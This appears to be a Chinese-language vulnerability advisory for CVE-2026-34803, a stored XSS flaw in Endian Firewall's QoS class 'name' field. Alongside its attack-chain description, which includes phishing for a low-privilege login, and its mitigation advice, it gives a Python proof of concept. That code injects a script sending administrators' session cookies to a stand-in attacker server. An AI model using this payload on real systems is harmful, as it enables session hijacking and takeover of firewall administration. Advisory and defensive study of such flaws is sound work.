CVE-2026-34803 CVSS 6.4 中危

CVE-2026-34803 Endian Firewall 存储型XSS漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34803

漏洞类型

存储型跨站脚本

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Endian Firewall

漏洞概述

Endian Firewall 3.3.25及之前版本存在存储型XSS漏洞。攻击者可在/manage/qos/classes/接口的name参数注入恶意JS代码。由于漏洞为存储型，当其他用户访问该页面时，恶意代码将被执行，从而窃取凭证或执行未授权操作。

技术细节

该漏洞源于Endian Firewall在处理QoS类别的“name”参数时，缺乏对用户输入的充分过滤和转义。攻击者需经过身份验证（低权限），向系统提交包含恶意JavaScript代码的数据。该数据被持久化存储在服务器端。当管理员或其他具备权限的用户浏览受影响的QoS管理页面时，浏览器会解析并执行存储的恶意脚本。由于CVSS向量为S:C（Scope Changed），攻击者可利用受害者浏览器的上下文访问当前域下的敏感数据，甚至以受害者身份执行管理操作。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标系统为Endian Firewall，且版本在3.3.25及以下。

STEP 2

2. 获取凭证

攻击者通过钓鱼或社会工程学获取一个低权限账户的登录凭证。

STEP 3

3. 漏洞利用

攻击者登录系统，向/manage/qos/classes/发送POST请求，在name字段中注入恶意JavaScript代码。

STEP 4

4. 持久化存储

服务器将包含恶意代码的数据保存，未经过滤直接存储在数据库中。

STEP 5

5. 触发执行

当管理员或其他用户访问受影响的QoS管理页面时，恶意脚本在受害者浏览器中执行。

STEP 6

6. 达成目的

攻击者窃取受害者的Session ID，进而劫持会话，提升权限或进行破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "https://<target-ip>/manage/qos/classes/"

# Attacker's session cookie (requires authentication)
cookies = {
    "EFGSESSION": "authenticated_session_id_here"
}

# Malicious payload injected into the 'name' parameter
payload = "<script>document.location='http://attacker-server/?c='+document.cookie</script>"

data = {
    "name": payload,
    "other_param": "value"
}

# Sending the POST request to exploit the vulnerability
response = requests.post(url, data=data, cookies=cookies, verify=False)

if response.status_code == 200:
    print("[+] Payload injected successfully.")
else:
    print("[-] Injection failed.")

影响范围

Endian Firewall <= 3.3.25

防御指南

临时缓解措施

建议立即限制对QoS管理页面的访问权限，仅允许核心管理员访问；在厂商发布补丁前，可使用WAF设备拦截包含常见XSS特征（如<script>, javascript:等）的恶意请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表